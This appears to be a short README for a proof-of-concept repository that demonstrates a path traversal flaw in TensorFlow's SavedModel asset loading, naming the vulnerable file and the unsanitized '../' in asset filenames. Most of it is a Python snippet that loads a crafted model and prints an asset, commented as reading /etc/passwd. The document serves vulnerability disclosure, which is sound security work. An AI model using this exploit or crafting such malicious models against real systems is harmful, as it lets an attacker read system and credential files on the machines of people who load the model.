surrealgrain/tf-savedmodel-path-traversal-poc

TensorFlow SavedModel Path Traversal PoC

Proof-of-concept for path traversal via AssetFileDef.filename in TensorFlow's SavedModel loading.

Vulnerability: tensorflow/python/trackable/asset.py - unsanitized ../ in asset filenames.

import tensorflow as tf
model = tf.saved_model.load("./")
result = model.read_asset()
print(result.numpy().decode())  # Reads /etc/passwd